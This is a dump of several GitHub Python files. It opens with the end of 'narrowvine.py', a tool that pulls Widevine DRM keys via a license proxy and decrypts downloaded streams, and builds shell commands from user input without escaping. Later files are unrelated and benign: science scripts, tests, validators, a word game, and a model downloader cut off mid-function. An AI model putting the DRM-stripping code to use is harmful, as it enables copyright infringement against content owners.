KEY_ARRAY:\n\t\t\tprint(\"[info][Found KEY] %s\"%item)\n\t\t\n\tdef work(self, pssh: bytes):\n\t\tlicense_request_data = self.generateRequestData(pssh)\n\t\tif license_request_data is None:\n\t\t\tsys.exit(\"generate requests data failed.\")\n\t\tlicense_response_data = self.license_request(license_request_data)\n\t\tself.getContentKey(license_request_data, license_response_data)\n\t\t\ndef getkeys(init_path,license_url):\n\tpssh = read_pssh(init_path)\n\tcdm = WidevineCDM(license_url)\n\tcdm.work(pssh)\n\t\nFILE_DIRECTORY=str(pathlib.Path(__file__).parent.absolute())\nTEMPORARY_PATH = FILE_DIRECTORY+\"/cache\"\nOUTPUT_PATH = FILE_DIRECTORY+\"/output\"\nVIDEO_ID = \"bv\"\nAUDIO_ID = \"ba\"\n\ndef osinfo():\n\tglobal PLATFORM\n\tif platform.system()== \"Darwin\":\n\t\tPLATFORM = \"\u0010Mac\"\n\telse:\n\t\tPLATFORM = platform.system()\n\ndef divider():\n\tcount = int(shutil.get_terminal_size().columns)\n\tcount = count - 1\n\tprint ('-' * count)\n\t\ndef empty_folder(folder):\n\tfiles = glob.glob('%s/*'%folder)\n\tfor f in files:\n\t\tos.remove(f)\n\tprint(\"Emptied Temporary Files!\")\n\tdivider()\n\tquit()\n\t\ndef parse_key (prompt):\n\tglobal key,kid,keys\n\tkey = prompt[30 : 62]\n\tkid = prompt[68 : 100]\n\tkeys = \"--key %s:%s\"%(kid,key)\n\treturn key,kid,keys\n\ndef download_drm_content(mpd_url):\n\tdivider()\n\tprint(\"Processing Video Info..\")\n\tos.system('yt-dlp --external-downloader aria2c --no-warnings --allow-unplayable-formats --no-check-certificate -F \"%s\"'%mpd_url)\n\tdivider()\n\tVIDEO_ID = input(\"ENTER VIDEO_ID (Press Enter for Best): \")\n\tif VIDEO_ID == \"\":\n\t\tVIDEO_ID = \"bv\"\n\t\n\tAUDIO_ID = input(\"ENTER AUDIO_ID (Press Enter for Best): \")\n\tif AUDIO_ID == \"\":\n\t\tAUDIO_ID = \"ba\"\n\t\n\tdivider()\n\tprint(\"Downloading Encrypted Video from CDN..\")\t\n\tos.system(f'yt-dlp -o \"{TEMPORARY_PATH}/encrypted_video.%(ext)s\" --no-warnings --external-downloader aria2c --allow-unplayable-formats --no-check-certificate -f {VIDEO_ID} \"{mpd_url}\" -o \"{TEMPORARY_PATH}/encrypted_video.%(ext)s\"')\n\tprint(\"Downloading Encrypted Audio from CDN..\")\n\tos.system(f'yt-dlp -o \"{TEMPORARY_PATH}/encrypted_audio.%(ext)s\" --no-warnings --external-downloader aria2c --allow-unplayable-formats --no-check-certificate -f {AUDIO_ID} \"{mpd_url}\"')\n\ndef decrypt_content():\n\tif PLATFORM == \"Windows\":\t\t\n\t\tkey_arg = \"\"\n\t\tfor items in KEY_ARRAY:\n\t\t\tkey_temp = \" --key %s\"%items\n\t\t\tkey_arg += key_temp\n\t\t\tkey_temp = \"\"\n\t\tkeys = key_arg\n\t\t\t\n\telse:\n\t\tparse_key(KEY_PROMPT)\n\t\t\n\tdivider()\n\tprint(\"Decrypting WideVine DRM.. (Takes some time)\")\n\tosinfo()\n\tif PLATFORM == \"Mac\":\n\t\tMP4DECRYPT_PATH = \"%s/mp4decrypt/mp4decrypt_mac\"%FILE_DIRECTORY\n\telif PLATFORM == \"Windows\":\n\t\tMP4DECRYPT_PATH = \"%s/mp4decrypt/mp4decrypt_win.exe\"%FILE_DIRECTORY\n\telif PLATFORM == \"Linux\":\n\t\tMP4DECRYPT_PATH = \"%s/mp4decrypt/mp4decrypt_linux\"%FILE_DIRECTORY\n\telse:\n\t\tMP4DECRYPT_PATH = MP4DECRYPT_PATH = \"mp4decrypt\"\n\t\t\n\tos.system('%s %s/encrypted_video.mp4 %s/decrypted_video.mp4 %s --show-progress'%(MP4DECRYPT_PATH,TEMPORARY_PATH,TEMPORARY_PATH,keys))\n\tos.system('%s %s/encrypted_audio.m4a %s/decrypted_audio.m4a %s --show-progress'%(MP4DECRYPT_PATH,TEMPORARY_PATH,TEMPORARY_PATH,keys))\n\tprint(\"[info] Decryption Complete!\")\n\ndef merge_content():\n\tglobal FILENAME\n\tFFMPEG_PATH = \"%s/ffmpeg.exe\"%FILE_DIRECTORY\n\tdivider()\n\tFILENAME=input(\"Enter File Name (with extension): \\n> \")\n\tdivider()\n\tprint(\"Merging Files and Processing %s.. (Takes a while)\"%FILENAME)\n\ttime.sleep(2)\n\tif PLATFORM == \"Windows\":\n\t\tos.system('%s -i %s/decrypted_video.mp4 -i %s/decrypted_audio.m4a -c:v copy -c:a copy %s/\"%s\"'%(FFMPEG_PATH,TEMPORARY_PATH,TEMPORARY_PATH,OUTPUT_PATH,FILENAME))\n\telse: \n\t\tos.system('ffmpeg --hide-banner -i %s/decrypted_video.mp4 -i %s/decrypted_audio.m4a -c:v copy -c:a copy %s/\"%s\"'%(TEMPORARY_PATH,TEMPORARY_PATH,OUTPUT_PATH,FILENAME))\n\t\t\nparser=argparse.ArgumentParser()\nparser.add_argument('-mpd', required=False, default=\"NULL\")\nparser.add_argument('-license', required=False, default=\"NULL\")\nargs = parser.parse_args()\n\nMPD_URL = args.mpd\nLICENSE_URL = args.license\n\ndef manual_input():\n\tglobal MPD_URL, LICENSE_URL\n\tMPD_URL = input(\"Enter MPD URL: \\n> \")\n\tdivider()\n\tLICENSE_URL = input(\"Enter License URL: \\n> \")\n\tif PLATFORM == \"Windows\":\n\t\tpass\n\telse:\n\t\tKEY_PROMPT = input(\"Enter WideVineDecryptor Prompt: \\n> \")\n\nosinfo()\ndivider()\nprint(\"**** NARROWVINE by vank0n **** (%s Detected)\"%PLATFORM)\ndivider()\n\nif PLATFORM == \"Windows\":\n\tif MPD_URL == \"NULL\" or LICENSE_URL == \"NULL\":\n\t\tmanual_input()\n\telse:\n\t\tpass\nelse:\n\tmanual_input()\n\tdivider()\n\nif PLATFORM == \"Windows\":\n\tdivider()\n\tprint(\"Starting Widevine Proxy.. (DO NOT CLOSE THE PROXY WINDOW!)\")\n\tos.startfile(\"%s/license_proxy.exe\"%FILE_DIRECTORY)\n\tdownload_drm_content(MPD_URL)\n\tdivider()\n\tprint(\"Extracting Widevine Keys..\")\n\tgetkeys(\"%s/encrypted_video.mp4\"%TEMPORARY_PATH,LICENSE_URL)\nelse:\n\tdownload_drm_content(MPD_URL)\n\tdivider()\n\tdecrypt_content()\n\t\ndecrypt_content()\nmerge_content()\ndivider()\nprint(\"[info] Process Finished. Final Video File is saved in /output directory.\")\nos.startfile(\"%s/%s\"%(OUTPUT_PATH,FILENAME))\ndivider()\n\ndelete_choice = input(\"Delete cache files? (y/n)\\ny) Yes (default)\\nn) No\\ny/n> \")\n\nif delete_choice == \"n\":\n\tdivider()\nelse:\n\tempty_folder(TEMPORARY_PATH)\n\ntime.sleep(2)\n\n\n\t\t\n\t\n","repo_name":"myck786/8888","sub_path":"narrowvine.py","file_name":"narrowvine.py","file_ext":"py","file_size_in_byte":9323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"8535628824","text":"#Written by Jacob J. Edginton\nimport numpy as np\nimport matplotlib.image\nfrom skimage import data\nimport matplotlib.pyplot as plt\nfrom skimage.io import imread, imshow\n\n\n#load image, different images can be loaded as long as they are in the correct folder, or the path is specified\nimage=imread('beam.jpg', as_gray=True) #RBG code generated by letting as_gray=False\n\n#imshow(image) #you can use this to view the image you have loaded \n\n\n#Define xy plane of object bassed on image array \ny = image[500]\nx=np.array(range(0,len(y)))\n\n\n#Slice data to the linear region\nw = y[(x<1600) & (x>300)]\nz = x[(x<1600) & (x>300)]\n\n\n#Fit data to a straight line\nfit_im,cov_im = np.polyfit(z,w,1,cov=True)\nsig_0 = np.sqrt(cov_im[0,0]) #The uncertainty in the slope\nsig_1 = np.sqrt(cov_im[1,1]) #The uncertainty in the intercept\npSpace=np.poly1d(fit_im)\n\n\n#Output relevant parameters\nprint('Slope = %.3e +/- %.3e' %(fit_im[0],sig_0))\nprint('Intercept = %.3e +/- %.3e' %(fit_im[1],sig_1))\n\n#Plot fitted data\nplt.xlabel('X - Position (cm)')\nplt.plot(z,w,color='#ff781f')\nplt.plot(z,pSpace(z))\nplt.show()\n","repo_name":"Jacob-J-E/Cycle-Two-Lab","sub_path":"Beer-Lambert/Jacob Investigating the Beer-Lambert Law/SKimage.py","file_name":"SKimage.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32937888677","text":"maths = []\n\nwith open('student_performance.csv') as f:\n\n for line in f:\n info = line.split(',')\n if info[0] == '\"gender\"':\n continue\n else:\n grade = int(info[5][1:-1])\n maths.append(grade)\na = max(maths)\n\ncount= 0\nmath_score_mean = sum(maths) / len(maths)\nprint(math_score_mean)\n#for i in maths:\n # if i < a:\n # count += 1\n\n\n\n\n\n\n\n\n\n\n\n#КОЛИЧСТВО УЧЕНИКОВ С НАИВЫСШИМ БАЛЛОМ\n#count= 0\n#for i in maths:\n # if i == a:\n # count+=1.\n#print(int(count))\n","repo_name":"roshak7/test_sf_analitics","sub_path":"работа с файлам/чтение файлов студентов/resuts.py","file_name":"resuts.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25228246284","text":"#!/usr/bin/env python3\n\"\"\"Tests for objects.\"\"\"\n\nimport numpy as np\nfrom numpy.random import rand\nfrom pytest import raises\n\nfrom nigsp import operations\nfrom nigsp.objects import SCGraph\n\n\n# ### Unit tests\ndef test_SCGraph():\n \"\"\"Test SCGraph, properties, and methods.\"\"\"\n # # Initialise object\n # Initialise content\n mtx = rand(4, 4)\n timeseries = rand(4, 6)\n atlas = rand(4, 3)\n filename = \"Laudna.nii.gz\"\n ts_split = {\"high\": rand(4, 6), \"low\": rand(4, 6)}\n\n # Initialise eigenvec to check zerocross\n def _bonnet(d, x):\n if d == 0:\n return np.ones_like(x)\n elif d == 1:\n return x\n else:\n return (\n (2 * d - 1) * x * _bonnet(d - 1, x) - (d - 1) * _bonnet(d - 2, x)\n ) / d\n\n x = np.linspace(-1, 1, 4)\n eigenvec = np.empty([4, 4], dtype=\"float32\")\n for n in range(4):\n eigenvec[:, n] = _bonnet(n, x)\n zx = np.linspace(0, 3, 4)\n\n # Initialise SCGraph proper\n scgraph = SCGraph(\n mtx,\n timeseries,\n atlas=atlas,\n filename=filename,\n eigenvec=eigenvec,\n ts_split=ts_split,\n index=2,\n )\n\n # # Assert properties\n assert scgraph.nnodes == mtx.shape[1]\n assert scgraph.ntimepoints == timeseries.shape[1]\n assert (scgraph.zerocross == zx).all()\n assert all(item in scgraph.split_keys for item in list(ts_split.keys()))\n\n # # Test methods\n # Only test split_graph, create_surrogates, compute_fc\n # Other methods are somewhat one-liner wrap-around of tested functions.\n\n # Test split_graph and split_graph index priority\n scgraph.split_graph()\n evs, tss = operations.graph_filter(timeseries, eigenvec, 2)\n # Update ts_split to be tss\n ts_split = tss\n\n assert all(item in list(evs.keys()) for item in list(scgraph.evec_split.keys()))\n assert all(item in list(tss.keys()) for item in list(scgraph.ts_split.keys()))\n assert (evs[\"low\"] == scgraph.evec_split[\"low\"]).all()\n assert (tss[\"low\"] == scgraph.ts_split[\"low\"]).all()\n\n scgraph.evec_split = {}\n scgraph.index = \"median\"\n scgraph.split_graph(index=2)\n\n assert (evs[\"low\"] == scgraph.evec_split[\"low\"]).all()\n\n # Test create_surrogates\n scgraph.create_surrogates(sc_type=\"informed\", n_surr=1, seed=6)\n i_surr = operations.sc_informed(timeseries, eigenvec, n_surr=1, seed=6)\n assert (scgraph.surr == i_surr).all()\n\n scgraph.lapl_mtx = mtx\n scgraph.create_surrogates(sc_type=\"uninformed\", n_surr=1, seed=6)\n u_surr = operations.sc_uninformed(timeseries, lapl_mtx=mtx, n_surr=1, seed=6)\n assert (scgraph.surr == u_surr).all()\n\n # Test compute_fc\n scgraph.compute_fc()\n fc = operations.functional_connectivity(timeseries)\n fc_low = operations.functional_connectivity(ts_split[\"low\"])\n\n assert (fc == scgraph.fc).all()\n assert all(item in [\"high\", \"low\"] for item in list(scgraph.fc_split.keys()))\n assert (fc_low == scgraph.fc_split[\"low\"]).all()\n\n\n# ### Break tests\ndef test_break_SCGraph():\n \"\"\"Break SCGraph and its methods.\"\"\"\n with raises(ValueError) as errorinfo:\n SCGraph(rand(3, 4), rand(4, 6))\n assert \"square matrix\" in str(errorinfo.value)\n\n with raises(ValueError) as errorinfo:\n SCGraph(rand(4, 4), rand(3, 6))\n assert \"number of parcels and nodes\" in str(errorinfo.value)\n\n with raises(ValueError) as errorinfo:\n SCGraph(rand(4, 4), rand(4, 6, 4, 5))\n assert \"more than 3 dimensions\" in str(errorinfo.value)\n\n scgraph = SCGraph(rand(4, 4), rand(4, 6), index=\"Chet\")\n with raises(ValueError) as errorinfo:\n scgraph.split_graph()\n assert \"Unknown option Chet\" in str(errorinfo.value)\n\n scgraph = SCGraph(rand(4, 4), rand(4, 6))\n with raises(ValueError) as errorinfo:\n scgraph.create_surrogates(sc_type=\"Fearne\")\n assert \"Unknown option Fearne\" in str(errorinfo.value)\n","repo_name":"MIPLabCH/nigsp","sub_path":"nigsp/tests/test_objects.py","file_name":"test_objects.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"31"} +{"seq_id":"35930892967","text":"import re\n\nclass Verifica:\n def cpf_soma(self, data, soma, indice):\n \n soma += int(data[indice]) * self.contador\n \n self.contador -= 1\n if (self.contador >= 2):\n return self.cpf_soma(data, soma, indice+1)\n return soma\n\n def cpf_divisao(self, data, soma):\n resto = soma * 10 % 11 if soma * 10 % 11 != 10 else 0\n return True if data == resto else False\n\n def cpf(self, data):\n # padroniza a string\n data = ''.join(re.findall(r\"[\\w']+\", data))\n\n # verifica se é um cpf de numeros repetidos\n if data in [s * 11 for s in [str(n) for n in range(10)]]:\n return False\n\n # faz a primeira verificacao\n self.contador = 10\n soma = self.cpf_soma(data, 0, 0) \n if (self.cpf_divisao(int(data[9]), soma)):\n # faz a segunda verificacao\n self.contador = 11\n soma = self.cpf_soma(data, 0, 0)\n if (self.cpf_divisao(int(data[10]), soma)):\n return True\n return False\n\n def cnpj(self, data):\n # padroniza a string\n data = ''.join(re.findall(r\"[\\w']+\", data))\n\n # verifica se é um cnpj de numeros repetidos\n if data in [s * 11 for s in [str(n) for n in range(10)]]:\n return False\n \n inteiros = list(map(int, data))\n novo = inteiros[:12]\n\n prod = [5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2]\n while len(novo) < 14:\n r = sum([x*y for (x, y) in zip(novo, prod)]) % 11\n if r > 1:\n f = 11 - r\n else:\n f = 0\n novo.append(f)\n prod.insert(0, 6)\n\n # Se o número gerado coincidir com o número original, é válido\n if novo == inteiros:\n return True\n return False\n\n","repo_name":"giovannabbottino/LGPD","sub_path":"controller_verificadora.py","file_name":"controller_verificadora.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18969044171","text":"import sys\nimport cv2\nimport csv\nimport re\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom collections import Counter\nfrom create_circle import midPointCircleDraw\n\ndef isNumber(x):\n\ttry:\n\t\tfloat(x)\n\t\treturn True\n\texcept ValueError:\n\t\treturn False\n\ndef intGaussPoint2D(mean, cov, grid):\n\tpoint = tuple(np.round(np.random.multivariate_normal(mean, cov)).astype(int))\n\twhile(not(point in grid)):\n\t\tpoint = tuple(np.round(np.random.multivariate_normal(mean, cov)).astype(int))\n\treturn point\n\ndef truncGauss(mu, sigma, bottom, top):\n\trand = int(random.gauss(mu, sigma))\n\twhile(rand < bottom or rand > top):\n\t\trand = int(random.gauss(mu, sigma))\n\treturn rand\n\ndef interpolateImg(img_path, px_per_km, hosp_coord=None, max_dist=None):\n\t#np.set_printoptions(threshold = sys.maxsize)\n\n\timage = cv2.imread(img_path)\n\tlowerbound = np.array([0, 0, 0]) # BGR-code of the lowest black\n\tupperbound = np.array([30, 30, 30]) # BGR-code of the highest black \n\tmask = cv2.inRange(image, lowerbound, upperbound) \n\t#get all non zero values\n\tcoord = cv2.findNonZero(mask)\n\n\tpoints = coord[:,0]\n\tgrid = np.floor(points / px_per_km).astype(int)\n\n\tthreshold = 1 / 2 * px_per_km**2\n\tpair_counter = Counter([tuple(pair) for pair in grid])\n\tinterpolated_grid = sorted([key for key, value in pair_counter.items() if value >= threshold])\n\tinterpolated_grid = np.array(interpolated_grid)\n\tnew_width = max(interpolated_grid[:,0]) + 1\n\tnew_height = max(interpolated_grid[:,1]) + 1\n\n\tsmall_img = np.ones((new_height, new_width, 3), np.uint8)*255\n\timg = np.ones((new_height*px_per_km, new_width*px_per_km, 3), np.uint8)*255\n\n\tfor x, y in interpolated_grid:\n\t\tcolor1 = (0, 170, 255)\n\t\tcolor2 = (0, 0, 255)\n\t\ttmpx = x * px_per_km\n\t\ttmpy = y * px_per_km\n\t\tif((x + y) % 2 == 0):\n\t\t\tsmall_img[y, x] = color1\n\t\t\timg[tmpy:tmpy+px_per_km, tmpx:tmpx+px_per_km] = color1\n\t\telse:\n\t\t\tsmall_img[y, x] = color2\n\t\t\timg[tmpy:tmpy+px_per_km, tmpx:tmpx+px_per_km] = color2\n\n\tsmall_img_dest_path = img_path.rsplit(\"/\", 1)[0] + \"/interpolated_small_img.png\"\n\timg_dest_path = img_path.rsplit(\"/\", 1)[0] + \"/interpolated_img.png\"\n\tcv2.imwrite(small_img_dest_path, small_img)\n\tcv2.imwrite(img_dest_path, img)\n\t\n\tif((hosp_coord != None) and (max_dist != None)):\n\t\tcolor1 = (255, 0, 0)\n\t\tcolor2 = (255, 170, 170)\n\t\ti = 0\n\t\tfor x, y, c in hosp_coord:\n\t\t\th = new_height * px_per_km\n\t\t\tw = new_width * px_per_km\n\t\t\ttmpx = int(x * px_per_km)\n\t\t\ttmpy = int(y * px_per_km)\n\t\t\timg[h-tmpy:h-tmpy+px_per_km, tmpx:tmpx+px_per_km] = color1\n\t\t\tcircle = midPointCircleDraw((tmpx, h-tmpy), max_dist*px_per_km)\n\t\t\thrange, wrange = range(h), range(w)\n\t\t\tfor xc, yc in circle:\n\t\t\t\tif(xc in wrange and yc in hrange):\n\t\t\t\t\timg[int(yc), int(xc)] = color2\n\t\t\t\t\n\t\timg_dest_path = img_path.rsplit(\"/\", 1)[0] + \"/interpolated_hosp_img.png\"\n\t\tcv2.imwrite(img_dest_path, img)\n\n\n\tinterpolated_grid[:,1] = abs(interpolated_grid[:,1] - new_height)\n\treturn interpolated_grid\n\n\ndef gaussPopulation(grid, population, mean, cov):\n\tgrid_dict = {}\n\n\t# put at least one person in every square in the grid if the population is greater than the grid size\n\tinit_value = 1 if population > grid.shape[0] else 0\n\t# adjust the number of point to generate based on how many are already present\n\tnpoints = population - grid.shape[0] if init_value == 1 else population\n\t\n\tfor x, y in grid:\n\t\tgrid_dict[(x, y)] = init_value\n\n\tprint(\"Generating the random population:\")\n\tfr = np.floor(population / 10)\n\tfor i in range(npoints):\n\t\tpoint = intGaussPoint2D(mean, cov, grid_dict)\n\t\tgrid_dict[point] += 1\n\t\tif i % fr == 0:\n\t\t\tpercent = int(np.round(i * 100 / npoints))\n\t\t\tprint(\"Generated \" + str(i) + \" points: \" + str(percent) + \"%\")\n\t\n\treturn grid_dict\n\n\ndef gaussPopulationCSV(grid, population, csv_path, cov, px_per_km):\n\twith open(csv_path, mode='r') as csv_file:\n\t\t# initialise the means and the probability distribution form the CSV\n\t\tcsv_reader = csv.reader(csv_file)\n\t\t\n\t\tcsv_pop = []\n\t\tcsv_means = []\n\t\tfor line in csv_reader:\n\t\t\tif(isNumber(line[0])):\n\t\t\t\tcsv_pop.append(int(line[2]))\n\t\t\t\ttmp = re.split('[(), ]', line[3])\n\t\t\t\tmean = tuple([float(x) for x in tmp if isNumber(x)])\n\t\t\t\tcsv_means.append(mean)\n\n\t\t#csv_pop = np.sqrt(csv_pop)\n\t\tcsv_pop = np.array(csv_pop) / np.sum(csv_pop)\n\t\tcsv_means = np.floor(np.array(csv_means) / px_per_km).astype(int)\n\n\t\t# initialise the grid dictionary\n\t\tgrid_dict = {}\n\n\t\t# put at least one person in every square in the grid if the population is greater than the grid size\n\t\tinit_value = 1 if population > grid.shape[0] else 0\n\t\t# adjust the number of point to generate based on how many are already present\n\t\tnpoints = population - grid.shape[0] if init_value == 1 else population\n\t\t\n\t\tfor x, y in grid:\n\t\t\tgrid_dict[(x, y)] = init_value\n\n\t\trng = np.random.default_rng()\n\t\trand_means = rng.choice(csv_means, npoints, p=csv_pop)\n\n\t\tprint(\"Generating the random population:\")\n\t\tfr = np.floor(population / 10)\n\t\ti = population - npoints\n\t\tfor mean in rand_means:\n\t\t\tpoint = intGaussPoint2D(mean, cov, grid_dict)\n\t\t\tgrid_dict[point] += 1\n\t\t\tif i % fr == 0:\n\t\t\t\tpercent = int(np.round(i * 100 / population))\n\t\t\t\tprint(\"Generated \" + str(i) + \" points: \" + str(percent) + \"%\")\n\t\t\ti += 1\n\n\t\treturn grid_dict\n\ndef plotPopulation(grid_dict, img_path=None):\n\tfig = plt.figure()\n\tax = Axes3D(fig)\n\n\tsequence_containing_x_vals = []\n\tsequence_containing_y_vals = []\n\n\tfor x, y in grid_dict:\n\t\tsequence_containing_x_vals.append(x)\n\t\tsequence_containing_y_vals.append(y)\n\n\tsequence_containing_z_vals = list(grid_dict.values())\n\n\tax.scatter(sequence_containing_x_vals, sequence_containing_y_vals, sequence_containing_z_vals)\n\tplt.gca().set_aspect('equal', adjustable='box')\n\t\n\tdest_folder = img_path.rsplit(\"/\", 1)[0] + \"/\" if img_path != None else \"\"\n\t\n\tax.view_init(20, 290)\n\tfig.suptitle('Population distribution\\nelev=20, azimut=290')\n\tplt.savefig(dest_folder + \"pop_distribution_20_290.pdf\", format='pdf', bbox_inches='tight')\n\t\n\tax.view_init(90, 270)\n\tfig.suptitle('Population distribution\\nelev=90, azimut=270')\n\tplt.savefig(dest_folder + \"pop_distribution_90_270.pdf\", format='pdf', bbox_inches='tight')\n\t\n\tfor i in range(0, 360, 90):\n\t\ttitle = \"Population distribution\\nelev=0, azimut=\" + str(i)\n\t\tfile_path = dest_folder + \"pop_distribution_0_\" + str(i) + \".pdf\"\n\t\tax.view_init(0, i)\n\t\tfig.suptitle(title)\n\t\tplt.savefig(file_path, format='pdf', bbox_inches='tight')\n\n\ndef imgExtractRequest(img_path, px_per_km, population, mean=None, csv_file=None, hosp_coord=None, max_dist=None, plot=False):\n\tprint(\"Generating the interpolated images...\")\n\tgrid = interpolateImg(img_path, px_per_km, hosp_coord, max_dist)\n\t\n\tprint(\"Interpolated images generated.\")\n\n\ttxt = input(\"Do you want to generate the gaussian distributed population? [y/n]\\n\")\n\n\tdone = False\n\twhile(not(done)):\n\t\tif(txt == \"n\"):\n\t\t\treturn None\n\t\telif(txt == \"y\"):\n\t\t\tdone = True\n\t\telse:\n\t\t\ttxt = input(\"Do you want to generate the gaussian distributed population? [y/n]\\n\")\n\n\t# define the covariance matrix rows\n\tcov_row1 = np.array([max(grid[:,0]), 0])\n\tcov_row2 = np.array([0, max(grid[:,1])])\n\tcov = np.matrix([cov_row1, cov_row2])\n\n\tif(csv_file == None):\n\t\t# normalize the mean on px_per_km\n\t\tmean = np.floor(np.array(mean) / px_per_km).astype(int)\n\t\tmean = tuple(mean)\n\n\t\tcov *= 5\n\n\t\tgrid_dict = gaussPopulation(grid, population, mean, cov)\n\telse:\n\t\tgrid_dict = gaussPopulationCSV(grid, population, csv_file, cov, px_per_km)\n\n\t'''\n\ts = 0\n\tfor i in range(33, 45):\n\t\tfor j in range(27, 40):\n\t\t\ts += grid_dict[(i, j)]\n\n\tprint(s)\n\t'''\n\n\tif plot:\n\t\tplotPopulation(grid_dict, img_path)\n\n\treturn grid_dict\n\n\nif __name__ == '__main__':\n\timg_path = sys.argv[1]\n\tmu = (39, 33)\n\tpx_per_km = 11\n\tpopulation = int(sys.argv[2])\n\timgExtractRequest(img_path, mu, px_per_km, population)","repo_name":"AndreaB2604/MasterThesis","sub_path":"instances_generator/img_extract_request.py","file_name":"img_extract_request.py","file_ext":"py","file_size_in_byte":7732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15500192155","text":"NQ = list(map(int,input().split()))\nlis1= []\nlis = []\nd = 0\nfor a in range(NQ[0]):\n c = tuple(map(int,input().split())) #rangeleri listenin içinde tuple şeklinde tutuyoruz\n lis.append(c)\n \n\nfor a in range(NQ[1]):\n b = int(input())\n f=0\n l=NQ[0]-1\n \n check = False \n while f < l: #sayının verilen range sınırları arasında en yakın olduğu sınırı bulmak için binary search kullanıyoruz.\n mid = (f + l + 1) // 2\n if b < lis[mid][0]:\n l = mid -1\n elif b > lis[mid][1]:\n f = mid +1\n if b >= lis[mid][0] and b <= lis[mid][1]: #Aramanın sonuna gelindiğinde verilen sayı middeki tuple ın sınırları içindeyse Yes bastırıyoruz.\n print(\"Yes\")\n check = True\n break\n if not check:\n if f= 0 and b >= lis[f][0] and b <= lis[f][1]:\n print(\"Yes\")\n else:\n print(\"No\")\n\t\t\t\n#https://www.hackerrank.com/contests/inzva-02-algorithm-1-onsite-2018/challenges/find-the-range/problem\n","repo_name":"tarikisildar/competitive","sub_path":"find_the_range.py","file_name":"find_the_range.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"69962294809","text":"# Problem Set 5: Ghost\n# Name: \n# Collaborators: \n# Time: \n#\n\nimport random\n\n# -----------------------------------\n# Helper code\n# (you don't need to understand this helper code)\nimport string\n\nWORDLIST_FILENAME = \"words.txt\"\n\ndef load_words():\n \"\"\"\n Returns a list of valid words. Words are strings of lowercase letters.\n \n Depending on the size of the word list, this function may\n take a while to finish.\n \"\"\"\n print('Loading word list from file...')\n # inFile: file\n inFile = open(WORDLIST_FILENAME, 'r', encoding='ascii')\n # wordlist: list of strings\n wordlist = []\n for line in inFile:\n wordlist.append(line.strip().lower())\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\ndef get_frequency_dict(sequence):\n \"\"\"\n Returns a dictionary where the keys are elements of the sequence\n and the values are integer counts, for the number of times that\n an element is repeated in the sequence.\n\n sequence: string or list\n return: dictionary\n \"\"\"\n # freqs: dictionary (element_type -> int)\n freq = {}\n for x in sequence:\n freq[x] = freq.get(x,0) + 1\n return freq\n\n\n# (end of helper code)\n# -----------------------------------\n\n# Actually load the dictionary of words and point to it with \n# the wordlist variable so that it can be accessed from anywhere\n# in the program.\nwordlist = load_words()\n\n# TO DO: your code begins here!\ndef word_ends_game(word, word_list):\n if len(word)<4:\n return False\n else:\n if word.lower() in word_list:\n return True\n else: \n return False\n\ndef word_can_be_formed(word, word_list):\n for entry in word_list:\n if word.lower() == entry[0:len(word)]:\n return True\n return False\n\n\n\ndef play_game(word_list):\n\n print()\n print()\n\n turn = 1;\n\n word = ''\n\n while (True):\n if turn%2==1:\n letter = input(\"Player 1: \")\n \n else:\n letter = input(\"Player 2: \")\n\n if letter not in string.ascii_letters:\n print(\"That's not a letter. Please Try again.\")\n continue\n\n\n turn = turn + 1\n word = word+letter\n\n if word_can_be_formed(word, word_list)==False:\n print('GAME OVER! ' +str(word.upper())+' does not start a word')\n word = ''\n return 0\n\n print()\n print(word.upper())\n\n if(word_ends_game(word, word_list)):\n print('GAME OVER! ' +str(word.upper())+' is a word.')\n word = ''\n return 0\n\n\ndef play_ghost(word_list):\n print()\n print('GHOST')\n while True:\n cmd = input('n: new game\\ne: end game\\n')\n if cmd == 'n' or cmd == 'N':\n play_game(word_list)\n print()\n elif cmd == 'e' or cmd == 'E':\n break\n else:\n print(\"Invalid command.\") \n\n\nplay_ghost(wordlist)\n\n\n\n","repo_name":"daytonpe/mit-6.00","sub_path":"ps05/ps5_ghost.py","file_name":"ps5_ghost.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8405631974","text":"from transformers import AutoModelForCausalLM, AutoTokenizer\r\nimport json\r\nimport os\r\nimport shutil\r\n\r\n# Define base path and model directory\r\nbase_path = os.getcwd()\r\nmodel_dir = os.path.join(base_path, \"models\")\r\n\r\n# Ensure the model directory exists\r\nos.makedirs(model_dir, exist_ok=True)\r\n\r\ndef download_model(model_name):\r\n \"\"\"\r\n Download a model and its tokenizer from Hugging Face if they are not already downloaded.\r\n Args:\r\n model_name (str): The name of the model on Hugging Face.\r\n \"\"\"\r\n # Format the model name to replace '--' with '_'\r\n formatted_model_name = model_name.replace('--', '_')\r\n formatted_model_name = model_name.replace('/', '_')\r\n target_dir = os.path.join(model_dir, f\"{formatted_model_name}\")\r\n\r\n # Check if the model already exists\r\n if os.path.exists(target_dir):\r\n print(f\"Model '{model_name}' already downloaded.\")\r\n return\r\n\r\n print(f\"Downloading: {model_name}\")\r\n\r\n # Download the model\r\n model = AutoModelForCausalLM.from_pretrained(\r\n model_name,\r\n device_map=\"auto\",\r\n trust_remote_code=False,\r\n revision=\"main\",\r\n cache_dir=model_dir\r\n )\r\n tokenizer = AutoTokenizer.from_pretrained(\r\n model_name,\r\n use_fast=True,\r\n cache_dir=model_dir,\r\n model_max_length=4096,\r\n truncation_side='left'\r\n )\r\n\r\n # Save the model and tokenizer to a directory\r\n 